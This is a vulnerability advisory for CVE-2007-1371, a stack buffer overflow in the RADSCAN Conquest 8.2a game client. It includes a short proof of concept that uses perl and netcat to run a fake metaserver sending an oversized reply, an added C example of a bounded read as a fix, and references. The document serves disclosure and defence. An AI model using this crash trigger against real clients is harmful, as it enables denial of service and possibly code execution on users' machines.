Radscan Conquest Multiple Remote Vulnerabilities
BID:22855
Info
| Bugtraq ID: | 22855 |
| Class: | Boundary Condition Error |
| CVE: | CVE-2007-1371 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 07 2007 12:00AM |
| Updated: | May 12 2015 07:33PM |
| Credit: | Luigi Auriemma is credited with the discovery of these vulnerabilities. |
| Vulnerable: | RADSCAN Conquest 8.2a |
| Not Vulnerable: | RADSCAN Conquest 8.2b |
Discussion
Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.
These issues affect version 8.2a; prior versions may also be affected.
Exploit / POC
The following proof of concept is available:
1. Launch a fake metaserver that sends more than 1024 chars:
perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n
2. Launch the client, specifying the alternate metaserver:
conquest -m -M 127.0.0.1
3. Interrupt the fake metaserver: conquest should have crashed while trying to execute code at offset 0x61616161
Solution / Fix
Solution:
To address this issue, the vendor released an update through the SVN repository. Please see the references for more information.
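A bounded read for the metaserver reply described in the proof of concept, as an added example that is not Conquest's code or the vendor's fix. The 1024-byte buffer size, the newline framing and the names `read_meta_line` and `demo` are assumptions made for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define META_BUFSZ 1024  /* size the PoC exceeds; actual buffer layout is assumed */

/* Read one '\n'-terminated reply from fd into buf (capacity bufsz).
 * Returns the line length, or -1 on I/O error or if the reply does not
 * fit; buf is always NUL-terminated and never written past bufsz. */
ssize_t read_meta_line(int fd, char *buf, size_t bufsz)
{
    size_t used = 0;
    if (bufsz == 0) return -1;
    buf[0] = '\0';
    for (;;) {
        char c;
        ssize_t n = read(fd, &c, 1);
        if (n < 0) {
            if (errno == EINTR) continue;    /* retry interrupted read */
            return -1;
        }
        if (n == 0 || c == '\n') break;      /* EOF or end of line */
        if (used + 1 >= bufsz) {             /* no room for c plus NUL */
            buf[0] = '\0';                   /* reject, do not truncate */
            return -1;
        }
        buf[used++] = c;
        buf[used] = '\0';
    }
    return (ssize_t)used;
}

/* Constructed input: a pipe carrying n 'a' bytes, like the PoC's reply. */
ssize_t demo(size_t n)
{
    int p[2];
    char reply[META_BUFSZ], chunk[4096];
    if (n > sizeof chunk || pipe(p) != 0) return -2;
    memset(chunk, 'a', n);
    if (write(p[1], chunk, n) != (ssize_t)n) return -2;
    close(p[1]);
    ssize_t r = read_meta_line(p[0], reply, sizeof reply);
    close(p[0]);
    return r;
}
```

Rejecting an oversized reply, rather than silently truncating it, keeps a hostile or broken metaserver from feeding partial data to later parsing.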
References
References:
- [conquest] Re: security bugs in conquest (Jon Trulson)
- Conquest Homepage (RADSCAN)
- Buffer-overflow in Conquest client 8.2a (svn 691) (Luigi Auriemma)